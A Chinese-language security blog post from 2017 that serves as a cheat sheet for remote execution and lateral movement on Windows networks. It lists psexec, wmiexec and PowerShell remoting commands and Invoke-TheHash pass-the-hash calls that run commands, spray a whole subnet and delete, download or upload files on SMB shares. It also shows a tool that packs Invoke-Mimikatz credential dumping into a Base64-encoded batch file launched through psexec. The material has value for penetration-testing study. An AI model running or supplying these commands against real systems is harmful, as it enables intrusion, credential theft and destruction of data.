MENU

远程执行

October 25, 2017 • Security

水文~

常用

Psexec

psexec \\192.168.1.1 -u username -p password -d -s calc

Wmiexec

cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 username password

Enter-PSSession

Enter-PSSession 192.168.1.1 -Credential username

Invoke-TheHash

项目地址

模块

  • Invoke-WMIExec.ps1
  • Invoke-SMBExec.ps1
  • Invoke-SMBClient.ps1
  • Invoke-TheHash.ps1

Invoke-WMIExec

WMI命令执行功能

Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

7379df8a-d12b-11e6-8e8e-6dc6da4be235.png

Invoke-SMBExec

支持SMB1,SMB2和SMB签名的SMB(PsExec)命令执行功能

Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

b899ecf2-d0f6-11e6-9bd7-750b218e86a0.png

Invoke-SMBClient

SMB文件共享功能

蹩脚英文就不翻译了.看得懂意思就行

List the contents of a root share directory:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\server\share -verbose

Recursively list the contents of a share starting at the root:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share

Recursively list the contents of a share subdirectory and return only the contents output to a variable:

$directory_contents = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share\subdirectory -Modify

Delete a file on a share:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\file.txt

Delete a file in subdirectories within a share:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\subdirectory\subdirectory\file.txt

Download a file from a share:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt

Download a file from within a share subdirectory and set a new filename:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\subdirectory\file.txt -Destination file.txt

Download a file from a share to a byte array variable instead of disk:

$password_file = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt -Modify

Upload a file to a share subdirectory:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source file.exe -Destination \\server\share\subdirectory\file.exe

Upload a file to share from a byte array variable:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source $file_byte_array -Destination \\server\share\file.txt -Modify

smb.png

Invoke-TheHash

针对多个目标运行Invoke-WMIExec和Invoke-SMBExec函数

Invoke-TheHash -Type WMIExec -Targets 192.168.100.0/24 -TargetsExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0

c0f69a62-d0f6-11e6-91f2-af9103571bde.png

ConvertTo-TargetList

输出转换Invoke-TheHash内容

Encode PowerShell Payload Into Bat Files

项目地址

将PowerShell脚本进行Base64编码后转换为Bat文件

示例

mimikatz为例:

python bat_armor.py --script-path examples/Invoke-mimikatz.ps1\ --target-filepath 'c:\windows\mimi.bat' --launch-string "Invoke-mimikatz -command '\"sekurlsa::logonpasswords\"'" --out examples/mimi.bat

powershell3.png

生成的文件如下所示:

powershell4.png

再使用psexec.py -c执行文件:

powershell5.png

启用多个RDP连接:

powershell6.png

Archives QR Code
QR Code for this page
Tipping QR Code